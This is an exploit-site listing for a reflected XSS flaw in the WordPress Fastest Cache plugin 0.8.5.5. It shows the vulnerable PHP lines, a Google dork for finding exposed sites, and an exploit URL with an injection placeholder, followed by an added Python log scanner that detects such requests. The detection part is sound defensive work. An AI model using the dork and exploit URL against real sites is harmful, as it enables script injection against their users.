WordPress Fastest Cache plugin XSS Vulnerability

Posted in Exploit
Full title: WordPress Fastest Cache plugin XSS Vulnerability
Date added: 01-12-2015
Category: web applications
Platform: php
Risk: Security Risk Medium
######################################################################
# Exploit Title: WordPress plugin wp-fastest-cache XSS Vulnerability
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: 0.8.5.5
# Google dork: inurl:/wp-content/plugins/wp-fastest-cache
######################################################################
  
 The code in ./wp-fastest-cache/templates/update_error.php, shown as the data flow from the request parameter to the output (the numbers are line numbers in that file):
  
 
        6:  $error_message = $_GET['error_message']; 
        7:  $error_message = str_replace(array("\"", "'"), "", $error_message); 
        8:  $error_message = strip_tags($error_message); 
        34: echo $error_message; 
 
  
  
Exploit
http://server/wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=/*XSS_HERE*/
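
A detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web-server access logs in Combined Log Format for direct requests to update_error.php that carry an error_message parameter. The log lines are constructed, and the plain-text allowlist for a normal message is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter name are taken from the advisory above.
TEMPLATE_PATH = "/wp-content/plugins/wp-fastest-cache/templates/update_error.php"
PARAM = "error_message"

# Assumption: a legitimate message is short plain text; anything else is escalated.
PLAIN_TEXT = re.compile(r"[\w\s.,:!?-]{0,200}")

# Combined Log Format: host ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=Update+failed HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /blog//wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 530',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/wp-fastest-cache/css/style.css HTTP/1.1" 200 1024',
]

def classify(line):
    """Return None for unrelated lines, else a dict describing the request."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # Decode and collapse duplicate slashes so path variants still match;
    # endswith() also covers WordPress installed in a sub-directory.
    path = re.sub(r"/{2,}", "/", unquote(url.path))
    if not path.endswith(TEMPLATE_PATH):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    plain = all(PLAIN_TEXT.fullmatch(v) for v in values)
    return {"host": m["host"], "time": m["time"], "status": int(m["status"]),
            "values": values, "severity": "review" if plain else "high"}

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"], hit["host"], hit["time"], hit["values"])
```
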

Source: 0day.today
